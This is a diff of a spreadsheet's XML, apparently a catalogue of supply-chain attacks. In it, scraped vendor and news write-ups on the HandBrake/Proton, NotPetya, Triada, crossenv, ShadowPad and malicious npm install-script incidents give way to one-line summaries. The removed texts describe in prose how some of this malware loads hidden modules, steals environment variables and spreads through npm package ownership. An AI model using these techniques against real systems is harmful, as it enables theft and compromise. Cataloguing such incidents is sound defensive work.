-        <is>
-          <t>['open', 'source', 'video', 'transcoder', 'content', 'search', 'advanced', 'search', 'quick', 'link', 'topic', 'active', 'topic', 'search', 'rule', 'contact', 'login', 'register', 'board', 'index', 'main', 'announcement', 'search', 'mirror', 'download', 'server', 'news', 'update', 'print', 'view', 'search', 'advanced', 'search', 'post', 'page', 'handbrake', 'moderator', 'post', 'download', 'server', 'post', 'handbrake', 'handbrake', 'need', 'file', 'handbrake', 'system', 'chance', 'handbrake', 'period', 'detection', 'process', 'activityagent', 'activity', 'monitor', 'application', 'reference', 'handbrakedmg', 'checksum', 'question', 'variant', 'osxproton', 'removal', 'open', 'terminal', 'application', 'command', 'librarylaunchagentsfrhandbrakeactivityagentplist', 'libraryrenderfilesactivityagentapp', 'libraryvideoframework', 'folder', 'handbrakeapp', 'install', 'action', 'information', 'password', 'process', 'update', 'definition', 'feature', 'morning', 'start', 'rolling', 'machine', 'unknown', 'malicious', 'file', 'match', 'hash', 'website', 'mirror', 'httpsgithubcomhandbrakehandbrakewikichecksum', 'download', 'investigation', 'primary', 'download', 'mirror', 'website', 'download', 'application', 'updater', 'unaffected', 'signature', 'install', 'download', 'application', 'updater', 'early', 'verification', 'check', 'system', 'old', 'relevant', 'information', 'available', 'update', 'post', 'notice', 'mirror', 'server', 'scratch', 'download', 'slow', 'usual', 'primary', 'pick', 'load', 'time', 'version', 'available', 'handbrake', 'moderator', 'post', 'download', 'server', 'post', 'handbrake', 'press', 'time', 'clarity', 'handbrake', 'team', 'independent', 'tranmission', 'developer', 'history', 'sense', 'author', 'app', 'part', 'current', 'handbrake', 'team', 'developer', 'virtual', 'machine', 'transmission', 'project', 'handbrake', 'moderator', 'post', 'download', 'server', 'post', 'handbrake', 'analysis', 'proton', 'analysis', 'easy', 'interesting', 'item', 'list', 'first', 'item', 'list', 'malware', 'extract', 'path', 'libraryextensionslittlesnitchkext', 'libraryextensionsradio', 'silencekext', 'path', 'check', 'disk', 'malware', 'course', 'macos', 'product', 'firewall', 'user', 'presence', 'malware', 'connect', 'command', 'control', 'server', 'malware', 'detection', 'various', 'user', 'handbrake', 'application', 'turn', 'little', 'snitch', 'lucky', 'locked', 'print', 'view', 'display', 'post', 'day', 'week', 'month', 'month', 'month', 'year', 'sort', 'author', 'post', 'time', 'subject', 'direction', 'post', 'page', 'return', 'announcement', 'main', 'announcement', 'question', 'community', 'window', 'device', 'preset', 'command', 'line', 'interface', 'general', 'question', 'feature', 'request', 'documentation', 'miscellaneous', 'tiki', 'benchmark', 'development', 'bug', 'index', 'time', 'delete', 'cookie', 'policy', 'contact', 'forum', 'software', 'privacy', 'term']</t>
-        </is>
-      </c>
     </row>
     <row r="45">
       <c r="A45" t="inlineStr">
@@ -1599,7 +1419,7 @@
       </c>
       <c r="C45" t="inlineStr">
         <is>
-          <t>something wrong server error access denied allowed page</t>
+          <t>Attackers have successfully compromised the accounting software M.E.Doc, popular across various industries in Ukraine, including financial institutions. Several of them executed a trojanized update of M.E.Doc, which allowed attackers to launch a massive ransomware campaign. Includes the NotPetya backdoor</t>
         </is>
       </c>
       <c r="D45" t="inlineStr">
@@ -1609,11 +1429,6 @@
 https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/</t>
         </is>
       </c>
-      <c r="E45" t="inlineStr">
-        <is>
-          <t>['wrong', 'server', 'error', 'access', 'page']</t>
-        </is>
-      </c>
     </row>
     <row r="46">
       <c r="A46" t="inlineStr">
@@ -1628,7 +1443,7 @@
       </c>
       <c r="C46" t="inlineStr">
         <is>
-          <t>javascript support required site fully operational browser browser obsolete page load correctly customers activate drweb license technical support documentation download drweb close partners online purchase library library library search search search contact tech support rules regarding submitting send message query form call forum tickets total active latest ticket call profile close home business estore download support partners information antivirus doctor news subscribe news digests news digests news comments news topic drweb products updates drweb avdesk promos training news community news corporate news virus alerts monthly reviews realtime news bait viruses mobile threats antivirus times issue issues categories news boxes news boxes site feeds press center press contact info press gallery back news list drweb trojan preinstalled android devices infects applications’ processes downloads malicious modules july virus analytics drweb detected malicious program built firmware several mobile devices running android trojan called androidtriada231 embedded system libraries penetrates processes running applications secretly download additional modules trojans androidtriada family embed system process zygote component used launch programs mobile devices infecting zygote trojans embed processes running applications privileges function part applications secretly download launch malicious modules unlike trojans family root privileges perform malicious actions androidtriada231 detected drweb virus analytics embedded libandroidruntimeso system library modified version found several mobile devices including leagoo plus leagoo nomu nomu libandroidruntimeso used android applications thus malicious code infected system found memory running applications androidtriada231 embedded source code library assumed insiders unscrupulous partners participated creating firmware infected mobile devices blamed dissemination trojan androidtriada231 embedded libandroidruntimeso gets control time application device makes record system zygote launched applications initial launch trojan performed zygote initialization malicious program sets parameters creates working directory checks environment running trojan dalvik environment intercepts system methods allows track start applications perform malicious activity immediately start main function androidtriada231 secretly additional malicious modules download trojan components additional modules androidtriada231 checks special subdirectory working directory previously created trojan subdirectory name include value software package name application process trojan infiltrated androidtriada231 finds directory seeks files 32mmd 64mmd 32bit 64bit operating systems respectively finds file trojan decrypts saves libcnfgpso loads using system methods deletes decrypted file device malicious program find required object seeks file 36jmd androidtriada231 decrypts file saves mmscorejar runs using class dexclassloader deletes created copy result androidtriada231 infiltrate various trojan modules processes application affect operation example virus writers make trojan download malicious plugins stealing confidential information bank applications cyberespionage modules intercepting correspondence social media clients messengers moreover androidtriada231 extract module androidtriada194origin libandroidruntimeso stored library encrypted form main function downloading additional malicious components internet well ensuring interaction since androidtriada231 embedded libraries operating system located system section cannot deleted using standard methods safe secure method trojan install clean android firmware drweb specialist notified manufacturers compromised smartphones existing problem users advised install possible updates released devices trojan rate vote account create account dont repost like benefit account tell think doctor web’s site administration news item enter admin beginning comment question author comments names comments home business support customers partners doctor contact info doctor doctor cybersecurity company focused detection prevention response technologies privacy policy download drweb android free threemonth trial protection features available renew trial license appgalleryon google continuing website consenting doctor web’s cookies technologies related collection visitor statistics learn</t>
+          <t>Virus analytics from Dr.Web detected a malicious program built into the firmware of several mobile devices running Android.  Google believes that a vendor using the name Yehuo or Blazefire infected the system image with the Triada malware.</t>
         </is>
       </c>
       <c r="D46" t="inlineStr">
@@ -1637,11 +1452,6 @@
 https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/</t>
         </is>
       </c>
-      <c r="E46" t="inlineStr">
-        <is>
-          <t>['site', 'operational', 'page', 'load', 'customer', 'license', 'technical', 'support', 'documentation', 'download', 'close', 'partner', 'online', 'purchase', 'search', 'search', 'search', 'contact', 'tech', 'support', 'rule', 'message', 'query', 'form', 'call', 'forum', 'ticket', 'active', 'late', 'ticket', 'call', 'profile', 'close', 'home', 'business', 'estore', 'partner', 'information', 'doctor', 'news', 'digest', 'news', 'digest', 'news', 'comment', 'news', 'topic', 'update', 'training', 'news', 'news', 'corporate', 'news', 'virus', 'monthly', 'review', 'realtime', 'news', 'bait', 'mobile', 'threat', 'issue', 'issue', 'category', 'news', 'box', 'news', 'box', 'site', 'press', 'center', 'press', 'contact', 'info', 'press', 'gallery', 'back', 'news', 'list', 'application', 'process', 'malicious', 'module', 'malicious', 'program', 'firmware', 'several', 'mobile', 'device', 'system', 'library', 'process', 'running', 'application', 'additional', 'module', 'trojan', 'system', 'process', 'zygote', 'component', 'launch', 'program', 'device', 'zygote', 'trojan', 'embed', 'process', 'running', 'application', 'privilege', 'part', 'application', 'malicious', 'module', 'trojan', 'family', 'root', 'privilege', 'malicious', 'action', 'analytic', 'system', 'library', 'version', 'several', 'mobile', 'device', 'leagoo', 'leagoo', 'application', 'malicious', 'code', 'system', 'memory', 'running', 'application', 'source', 'code', 'library', 'insider', 'unscrupulous', 'partner', 'firmware', 'mobile', 'device', 'dissemination', 'libandroidruntimeso', 'control', 'time', 'application', 'device', 'record', 'system', 'zygote', 'application', 'initial', 'launch', 'zygote', 'initialization', 'malicious', 'program', 'parameter', 'directory', 'check', 'environment', 'environment', 'system', 'method', 'track', 'start', 'application', 'malicious', 'activity', 'main', 'function', 'additional', 'malicious', 'module', 'component', 'additional', 'module', 'special', 'subdirectory', 'directory', 'subdirectory', 'name', 'value', 'software', 'package', 'name', 'application', 'process', 'directory', 'file', '32mmd', '32bit', '64bit', 'operating', 'system', 'file', 'decrypt', 'libcnfgpso', 'load', 'system', 'method', 'file', 'device', 'malicious', 'program', 'object', 'file', 'androidtriada231', 'decrypt', 'file', 'run', 'class', 'dexclassloader', 'copy', 'result', 'various', 'trojan', 'module', 'application', 'operation', 'example', 'virus', 'writer', 'download', 'malicious', 'plugin', 'confidential', 'information', 'bank', 'application', 'cyberespionage', 'module', 'correspondence', 'social', 'medium', 'client', 'messenger', 'module', 'library', 'form', 'main', 'function', 'additional', 'malicious', 'component', 'internet', 'interaction', 'library', 'operating', 'system', 'system', 'section', 'standard', 'method', 'safe', 'secure', 'method', 'manufacturer', 'smartphone', 'problem', 'user', 'possible', 'update', 'device', 'rate', 'vote', 'account', 'account', 'benefit', 'account', 'tell', 'doctor', 'web', 'site', 'administration', 'news', 'item', 'admin', 'comment', 'question', 'author', 'name', 'comment', 'home', 'business', 'support', 'customer', 'partner', 'doctor', 'contact', 'info', 'doctor', 'doctor', 'cybersecurity', 'company', 'detection', 'prevention', 'response', 'technology', 'policy', 'free', 'trial', 'protection', 'available', 'trial', 'license', 'website', 'doctor', 'web', 'cookie', 'collection', 'visitor', 'statistic']</t>
-        </is>
-      </c>
     </row>
     <row r="47">
       <c r="A47" t="inlineStr">
@@ -1656,17 +1466,12 @@
       </c>
       <c r="C47" t="inlineStr">
         <is>
-          <t>blog archive npmjscom status support blog discontinued updates team published github blog github changelog crossenv malware registry august user notified twitter package name similar popular crossenv package sending environment variables installation context npmhacktasknet investigated report immediately took action remove package investigation remove packages total july user named hacktask published number packages names similar popular packages refer practice “typosquatting” past it’s mostly accidental cases we’ve seen deliberate typosquatting authors libraries compete existing packages time package naming deliberate malicious—the intent collect useful data tricked users hacktask packages removed registry adam baldwin lift also looked incident packages owned hacktask package setup code every file public registry indexed content hash make scans like possible find instances specific file contents exposure following list hacktask packages count total downloads download counts packages larger last days public interest problem numbers exposure revealing effect malware note downloads typical public package published registry registry mirrors automatically downloading copies real danger came crossenv package nearly downloads secondary exposure jquery typosquats even case downloads come mirrors requesting copies versions crossenv published estimate real installations crossenv probably fewer babelcli crossenvjs crossenv d3js fabricjs ffmepg gruntcli httpproxyjs jqueryjs mariadb mongose mssqlnode mssqljs mysqljs nodefabric nodeopencv nodeopensl nodeopenssl nodesqlite nodetkinter nodecaffe nodefabric nodeffmpeg nodemailerjs nodemailerjs nodemssql noderequest nodesass nodesqlite opencvjs openssljs proxyjs shadowsock sqlitejs sqliter sqlserver tkinter downloaded installed packages immediately revoke replace credentials might shell environment plan next hacktask email address banned using throwaway email addresses sufficient prevent human behind trying felt necessary gesture supporting lift node project ongoing work static analysis public registry packages find every problem determining package contains malicious content published course equivalent halting problem therefore something we’re discussing various approaches detecting preventing publication—either accidental malicious—of packages names close existing packages programmatic ways detect might block publication we’re using smyte service detect spam published registry experimenting using detect kinds violations terms service please reach immediately find malware registry best sending email securitynpmjscom clean problem find related problems august 1156am ceejbot crossenv registry malware disclosure able continue nice things despite people like npmjs javascript securing</t>
+          <t>38 instances of typosquatting attacks that collect and exfiltrate environment variables were identified.</t>
         </is>
       </c>
       <c r="D47" t="inlineStr">
         <is>
           <t>https://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry</t>
-        </is>
-      </c>
-      <c r="E47" t="inlineStr">
-        <is>
-          <t>['blog', 'archive', 'status', 'support', 'blog', 'update', 'team', 'user', 'twitter', 'package', 'name', 'similar', 'popular', 'crossenv', 'package', 'environment', 'variable', 'installation', 'context', 'npmhacktasknet', 'report', 'action', 'package', 'investigation', 'package', 'total', 'user', 'hacktask', 'number', 'package', 'name', 'similar', 'popular', 'package', 'practice', 'past', 'accidental', 'case', 'deliberate', 'author', 'library', 'package', 'time', 'package', 'deliberate', 'malicious', 'intent', 'useful', 'datum', 'user', 'hacktask', 'package', 'registry', 'incident', 'package', 'hacktask', 'package', 'setup', 'code', 'file', 'public', 'registry', 'content', 'hash', 'scan', 'possible', 'instance', 'specific', 'file', 'content', 'exposure', 'list', 'hacktask', 'package', 'total', 'download', 'download', 'package', 'large', 'last', 'day', 'public', 'interest', 'problem', 'number', 'exposure', 'effect', 'malware', 'typical', 'public', 'package', 'registry', 'registry', 'mirror', 'copy', 'real', 'danger', 'crossenv', 'package', 'secondary', 'exposure', 'jquery', 'typosquat', 'case', 'download', 'mirror', 'copy', 'version', 'estimate', 'real', 'installation', 'crossenv', 'few', 'fabricjs', 'nodemssql', 'noderequ', 'sqliter', 'package', 'replace', 'credential', 'environment', 'plan', 'next', 'hacktask', 'email', 'address', 'throwaway', 'email', 'address', 'sufficient', 'human', 'necessary', 'gesture', 'lift', 'project', 'ongoing', 'work', 'static', 'analysis', 'public', 'registry', 'package', 'problem', 'package', 'malicious', 'content', 'course', 'equivalent', 'halting', 'problem', 'various', 'approach', 'publication', 'accidental', 'malicious', 'package', 'name', 'package', 'programmatic', 'way', 'publication', 'smyte', 'service', 'registry', 'kind', 'violation', 'term', 'service', 'registry', 'email', 'related', 'problem', 'able', 'nice', 'thing', 'people']</t>
         </is>
       </c>
     </row>
@@ -1683,7 +1488,7 @@
       </c>
       <c r="C48" t="inlineStr">
         <is>
-          <t>solutions home products small business employees medium business employees enterprise employees kaspersky companyaccount touch dark mode english russian spanish solutions hybrid cloud learn internet things embedded learn management defense learn industrial cybersecurity learn fraud prevention learn solutions blockchain kaspersky operations center industries national cybersecurity learn industrial cybersecurity learn finance services cybersecurity learn healthcare cybersecurity learn transportation cybersecurity learn retail cybersecurity learn industries telecom cybersecurity blockchain view products kaspersky endpoint business learn kaspersky endpoint detection response learn kaspersky optimum learn kaspersky anti targeted attack platform learn kaspersky managed detection response learn kaspersky sandbox learn products kaspersky mail server kaspersky internet gateway kaspersky embedded systems kaspersky hybrid cloud kaspersky hybrid cloud azure view services kaspersky cybersecurity services learn kaspersky adaptive online training learn kaspersky premium support learn kaspersky intelligence learn kaspersky intelligence reporting learn kaspersky targeted attack discovery learn services kaspersky professional services kaspersky incident response kaspersky cybersecurity training kaspersky incident communications kaspersky awareness view resource center case studies white papers datasheets technologies mitre attck transparency corporate news press center careers innovation sponsorship policy blog contacts gdpr subscribe dark mode login securelist menu english russian spanish existing customers personal kaspersky renew product update product customer support business ksos portal kaspersky business technical support knowledge base renew license home products trialsupdate resource center business small business employees medium business employees enterprise employees securelist threats financial threats mobile threats threats secure environment vulnerabilities exploits spam phishing industrial threats categories reports incidents research malware reports spam phishing reports publications kaspersky bulletin archive tags logbook webinars statistics encyclopedia threats descriptions company transparency corporate news press center careers sponsorships policy blog contacts partners find partner partner program content menu close subscribe kaspersky dark mode threats threats targeted attacks secure environment mobile threats financial threats spam phishing industrial threats threats vulnerabilities exploits categories categories reports malware descriptions bulletin malware reports spam phishing reports technologies research publications sections archive tags webinars logbook statistics encyclopedia threats descriptions sorry page requested cannot found searching something else take look latest reports sorry page requested cannot found searching something else take look latest reports reports hrserv previously unknown shell used attack report kaspersky researchers provide analysis previously unknown hrserv shell exhibits crimeware features likely active since modern asian groups’ tactics techniques procedures ttps asian groups target various organizations multitude regions industries created report provide cybersecurity community bestprepared intelligence data effectively counteract asian groups cascade compromise unveiling lazarus’ campaign unveil lazarus campaign exploiting company products examine intricate connections campaigns catch wild triangle kaspersky researchers obtained stages operation triangulation campaign targeting iphones ipads including zeroday exploits validators triangledb implant additional modules latest posts malware reports android malware android malware android malware great posts patched windows attack surface still exploitable elsayed elrefaei ashraf refaat kaspersky gert malware descriptions what’s notepad infected text editors target chinese users sergey puzan spam phishing reports spam phishing tatyana kulikova olga svistunova andrey kovtun irina shimko roman dedenok subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe threats threats targeted attacks secure environment mobile threats financial threats spam phishing industrial threats threats vulnerabilities exploits categories categories reports malware descriptions bulletin malware reports spam phishing reports technologies research publications sections archive tags webinars logbook statistics encyclopedia threats descriptions kaspersky rights reserved registered trademarks service marks property respective owners privacy policy license agreement cookies subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe</t>
+          <t>Installers for several NetSarang products were distributed with ShadowPad backdoor from the company's offical release servers.</t>
         </is>
       </c>
       <c r="D48" t="inlineStr">
@@ -1692,11 +1497,6 @@
 https://web.archive.org/web/20170815192514/https://www.netsarang.com/news/security_exploit_in_july_18_2017_build.html</t>
         </is>
       </c>
-      <c r="E48" t="inlineStr">
-        <is>
-          <t>['solution', 'home', 'product', 'small', 'business', 'employee', 'medium', 'business', 'employee', 'enterprise', 'employee', 'dark', 'mode', 'solution', 'hybrid', 'cloud', 'internet', 'thing', 'management', 'defense', 'industrial', 'cybersecurity', 'fraud', 'prevention', 'solution', 'blockchain', 'kaspersky', 'operation', 'center', 'industry', 'national', 'cybersecurity', 'industrial', 'cybersecurity', 'finance', 'service', 'cybersecurity', 'healthcare', 'cybersecurity', 'transportation', 'cybersecurity', 'retail', 'cybersecurity', 'industry', 'telecom', 'cybersecurity', 'blockchain', 'view', 'product', 'kaspersky', 'endpoint', 'business', 'kaspersky', 'endpoint', 'detection', 'response', 'optimum', 'anti', 'attack', 'platform', 'kaspersky', 'detection', 'response', 'product', 'kaspersky', 'mail', 'server', 'internet', 'gateway', 'kaspersky', 'system', 'cloud', 'azure', 'view', 'service', 'kaspersky', 'cybersecurity', 'service', 'online', 'training', 'premium', 'support', 'kaspersky', 'intelligence', 'intelligence', 'reporting', 'attack', 'service', 'service', 'response', 'cybersecurity', 'training', 'incident', 'communication', 'kaspersky', 'awareness', 'view', 'resource', 'center', 'case', 'white', 'paper', 'datasheet', 'technology', 'mitre', 'attck', 'transparency', 'corporate', 'news', 'press', 'center', 'career', 'innovation', 'sponsorship', 'policy', 'blog', 'contact', 'dark', 'mode', 'login', 'securelist', 'spanish', 'customer', 'personal', 'kaspersky', 'product', 'update', 'product', 'customer', 'support', 'business', 'technical', 'support', 'knowledge', 'base', 'license', 'home', 'product', 'resource', 'center', 'business', 'small', 'business', 'employee', 'medium', 'business', 'employee', 'enterprise', 'employee', 'securelist', 'threat', 'financial', 'threat', 'mobile', 'threat', 'threat', 'secure', 'environment', 'vulnerability', 'spam', 'industrial', 'threat', 'category', 'report', 'incident', 'phishing', 'report', 'kaspersky', 'bulletin', 'archive', 'tag', 'logbook', 'webinar', 'statistic', 'encyclopedia', 'threat', 'description', 'company', 'transparency', 'corporate', 'news', 'press', 'center', 'career', 'sponsorship', 'policy', 'blog', 'contact', 'partner', 'partner', 'partner', 'program', 'content', 'menu', 'close', 'subscribe', 'mode', 'threat', 'threat', 'attack', 'environment', 'mobile', 'threat', 'financial', 'threat', 'spam', 'industrial', 'threat', 'threat', 'vulnerability', 'category', 'category', 'malware', 'description', 'bulletin', 'phishing', 'report', 'research', 'publication', 'archive', 'tag', 'webinar', 'logbook', 'statistic', 'encyclopedia', 'threat', 'description', 'sorry', 'page', 'late', 'report', 'sorry', 'page', 'late', 'report', 'unknown', 'shell', 'attack', 'report', 'kaspersky', 'researcher', 'analysis', 'unknown', 'feature', 'active', 'modern', 'asian', 'group', 'tactic', 'technique', 'procedure', 'asian', 'group', 'various', 'organization', 'multitude', 'region', 'industry', 'report', 'cybersecurity', 'community', 'bestprepared', 'intelligence', 'datum', 'asian', 'group', 'compromise', 'campaign', 'campaign', 'company', 'product', 'intricate', 'connection', 'campaign', 'wild', 'triangle', 'kaspersky', 'researcher', 'stage', 'operation', 'triangulation', 'campaign', 'iphone', 'ipad', 'zeroday', 'validator', 'implant', 'additional', 'module', 'late', 'post', 'post', 'attack', 'surface', 'exploitable', 'kaspersky', 'gert', 'malware', 'description', 'notepad', 'text', 'editor', 'chinese', 'user', 'spam', 'phishing', 'report', 'spam', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe', 'threat', 'threat', 'attack', 'environment', 'mobile', 'threat', 'financial', 'threat', 'spam', 'industrial', 'threat', 'threat', 'vulnerability', 'category', 'category', 'malware', 'description', 'bulletin', 'phishing', 'report', 'research', 'publication', 'archive', 'tag', 'webinar', 'logbook', 'statistic', 'encyclopedia', 'threat', 'description', 'kaspersky', 'right', 'trademark', 'service', 'property', 'respective', 'owner', 'privacy', 'policy', 'license', 'agreement', 'cookie', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe']</t>
-        </is>
-      </c>
     </row>
     <row r="49">
       <c r="A49" t="inlineStr">
@@ -1711,17 +1511,12 @@
       </c>
       <c r="C49" t="inlineStr">
         <is>
-          <t>articles news informs inspires search search hunting malicious packages jordan wright share last week tweet posted showing multiple packages published javascript package manager stole users’ environment variables kentcdodds kent looks like package stealing variables install using crossenv package bait pictwittercomresrg8exsx oscar bolmsten ocee august names malicious packages typosquats popular legitimate packages case attackers relied developers incorrectly typing name package install dangerous many environments store secret keys sensitive bits information environment variables administrators mistakenly installed malicious packages keys would harvested sent attacker particular attack malicious packages listed depend legitimate counterparts correct package would eventually installed developer would none wiser history dealing malicious packages either hijacked legitimate packages malicious packages created scratch decided analyze entire package repository malicious packages isnt npms first rodeo isnt first time incidents like author unpublished packages response naming dispute packages listed dependencies many packages causing widescale disruption concerns around possible hijacking packages attackers another study published earlier year researcher able gain direct access packages indirect access packages either bruteforcing weak credentials reusing passwords discovered unrelated breaches leading mass password resets across impact hijacked malicious packages compounded structured encourages making small packages solve single problem leads network small packages depend many packages case credential compromise research author able gain access highly dependedupon packages giving much wider reach would otherwise example heres showing dependency graph packages source graphcommons malicious packages take systems previous cases access packages gained researchers however question stands attacker gained access packages access gain control systems easiest also leveraged malicious typosquat packages abuse ability preinstall postinstall scripts arbitrary system commands specified packages packagejson file either package installed commands anything ability issue fact installation scripts often used help packages complex ways however easy attackers leverage access packages hijacked created order easily compromise systems mind lets analyze entire space hunt potentially malicious packages hunting malicious packages getting packages first step analysis getting package information registry runs couchdb registrynpmjsorg used endpoint returned package information json since deprecated instead leverage replica instance registry replicatenpmjsorg technique leveraged libraries copy json data every package curl httpsreplicatenpmjscomregistrydesignscratchviewbyfield npmjson json processing tool parse package name scripts download nifty oneliner npmjson rows toentries value objects name valuename scripts valuescripts tarball valuedisttarball npmscriptsjson make analysis easier well write quick python script find packages preinstall postinstall install scripts find files executed script search files strings could indicate suspicious activity findings packages developers known potential implications installation scripts quite first things noticed research packages aimed show impact exact issues seemingly benign tracking scripts next thing found scripts tracked packages installed provides download metrics package listing appears authors wanted granular data causing potential concerns around user privacy packages using google analytics piwik track installations packages less obvious tracking tracking scripts within javascript installation files rather embedding shell commands packagejson tracking packages discovered ikst tracking script botbait tracking script mktmpio tracking script anarchy tracking script malicious scripts finally looked packages installation scripts obviously malicious nature installed packages could disastrous effects users system case mrrobot digging remaining packages came across interesting installation script shrugginglogging package packages claims simple adds ascii shrug messages also includes nasty postinstall script adds packages author mrrobot every package owned person install heres relevant snippet find full function listing script first uses whoami command current user’s username scrapes npmjsorg website packages owned user finally uses owner command mrrobot owner packages author also published packages include backdoor testmodulea pandoradoomsday worming local packages last malicious package discovered code many ways identical packages mrrobot different trick sleeve instead modifying owners locallyowned packages sdfjghlkfjdshlkjdhsfg module shows proof concept infect republish local packages sdfjghlkfjdshlkjdhsfg installation script shows process would look like modifying republishing find full source proofofconcept exact technique easily modified worm local package owned person install conclusion it’s important note issues dont apply package managers allow maintainers specify commands executed package installed issue arguably impactful simply dependency structure discussed earlier addition important note hard problem solve static analysis packages uploaded difficult much companies dedicated solving problem also reports developers suggests work done leverage various metrics help prevent users downloading malicious packages working thing uses quality metrics prompts users would probably catch everything folks brought 多分◯ちゃんよね🕵🏼‍♀️ maybekatz august meantime recommended continue cautious adding dependencies projects addition minimizing number dependencies recommend enforcing strict versioning integrity checking dependencies done natively using yarn using shrinkwrap command easy peace mind code used development used production packages articles copyright terms conditions privacy notice</t>
+          <t>8 instances of typosquatting attacks that add permissions and track install data were identified.</t>
         </is>
       </c>
       <c r="D49" t="inlineStr">
         <is>
           <t>https://duo.com/decipher/hunting-malicious-npm-packages</t>
-        </is>
-      </c>
-      <c r="E49" t="inlineStr">
-        <is>
-          <t>['article', 'news', 'search', 'search', 'malicious', 'package', 'last', 'week', 'tweet', 'multiple', 'package', 'javascript', 'package', 'manager', 'user', 'environment', 'variable', 'package', 'stealing', 'variable', 'crossenv', 'package', 'bait', 'name', 'malicious', 'package', 'popular', 'legitimate', 'package', 'case', 'attacker', 'developer', 'name', 'package', 'dangerous', 'many', 'environment', 'secret', 'key', 'sensitive', 'bit', 'information', 'environment', 'variable', 'administrator', 'malicious', 'package', 'key', 'attacker', 'particular', 'attack', 'malicious', 'package', 'legitimate', 'counterpart', 'correct', 'package', 'developer', 'none', 'wise', 'history', 'malicious', 'package', 'legitimate', 'package', 'malicious', 'package', 'scratch', 'entire', 'package', 'repository', 'malicious', 'package', 'npm', 'first', 'rodeo', 'first', 'time', 'incident', 'author', 'package', 'dispute', 'package', 'dependency', 'many', 'package', 'widescale', 'disruption', 'concern', 'possible', 'hijacking', 'package', 'attacker', 'study', 'early', 'year', 'researcher', 'able', 'direct', 'access', 'package', 'indirect', 'access', 'package', 'weak', 'credential', 'password', 'unrelated', 'breach', 'mass', 'password', 'impact', 'malicious', 'package', 'structured', 'encourage', 'small', 'package', 'single', 'problem', 'network', 'small', 'package', 'many', 'package', 'case', 'credential', 'compromise', 'research', 'author', 'able', 'access', 'dependedupon', 'package', 'wide', 'reach', 'here', 'dependency', 'graph', 'package', 'source', 'graphcommon', 'malicious', 'package', 'system', 'previous', 'case', 'access', 'package', 'researcher', 'question', 'attacker', 'access', 'package', 'access', 'gain', 'control', 'system', 'easy', 'malicious', 'typosquat', 'package', 'abuse', 'ability', 'preinstall', 'postinstall', 'script', 'arbitrary', 'system', 'command', 'package', 'packagejson', 'file', 'package', 'command', 'ability', 'issue', 'fact', 'installation', 'script', 'help', 'complex', 'way', 'easy', 'attacker', 'access', 'package', 'order', 'system', 'mind', 'entire', 'space', 'hunt', 'malicious', 'package', 'malicious', 'package', 'package', 'first', 'step', 'analysis', 'package', 'information', 'registry', 'endpoint', 'package', 'information', 'registry', 'replicatenpmjsorg', 'technique', 'library', 'datum', 'package', 'processing', 'tool', 'parse', 'package', 'name', 'script', 'row', 'value', 'object', 'name', 'valuename', 'script', 'analysis', 'quick', 'python', 'script', 'package', 'postinstall', 'script', 'file', 'script', 'search', 'file', 'string', 'suspicious', 'activity', 'finding', 'developer', 'potential', 'implication', 'installation', 'script', 'first', 'thing', 'research', 'package', 'show', 'impact', 'exact', 'issue', 'benign', 'tracking', 'script', 'next', 'thing', 'script', 'package', 'download', 'metric', 'package', 'listing', 'author', 'granular', 'datum', 'potential', 'concern', 'user', 'privacy', 'package', 'analytic', 'track', 'installation', 'package', 'obvious', 'tracking', 'tracking', 'script', 'javascript', 'installation', 'file', 'shell', 'command', 'packagejson', 'tracking', 'package', 'script', 'botbait', 'tracking', 'script', 'mktmpio', 'tracking', 'script', 'anarchy', 'tracking', 'script', 'malicious', 'script', 'package', 'installation', 'script', 'malicious', 'nature', 'package', 'disastrous', 'effect', 'user', 'system', 'case', 'package', 'interesting', 'installation', 'script', 'package', 'package', 'simple', 'ascii', 'shrug', 'message', 'nasty', 'script', 'package', 'author', 'package', 'person', 'here', 'relevant', 'snippet', 'full', 'function', 'listing', 'script', 'command', 'current', 'user', 'scrape', 'package', 'user', 'package', 'author', 'package', 'pandoradoomsday', 'local', 'package', 'last', 'malicious', 'package', 'code', 'many', 'way', 'identical', 'package', 'different', 'trick', 'sleeve', 'owner', 'module', 'proof', 'concept', 'republish', 'local', 'package', 'sdfjghlkfjdshlkjdhsfg', 'installation', 'script', 'process', 'republishing', 'full', 'source', 'exact', 'technique', 'worm', 'local', 'package', 'person', 'conclusion', 'important', 'note', 'issue', 'package', 'manager', 'command', 'package', 'issue', 'dependency', 'structure', 'early', 'addition', 'important', 'note', 'hard', 'problem', 'static', 'analysis', 'package', 'difficult', 'much', 'company', 'dedicated', 'problem', 'developer', 'work', 'leverage', 'various', 'metric', 'user', 'malicious', 'package', 'thing', 'quality', 'metric', 'user', 'folk', 'cautious', 'dependency', 'project', 'addition', 'number', 'dependency', 'strict', 'integrity', 'dependency', 'yarn', 'command', 'easy', 'peace', 'mind', 'development', 'production', 'package', 'article', 'copyright', 'term', 'condition', 'privacy']</t>
         </is>
       </c>
     </row>
@@ -1738,17 +1533,12 @@
       </c>
       <c r="C50" t="inlineStr">
         <is>
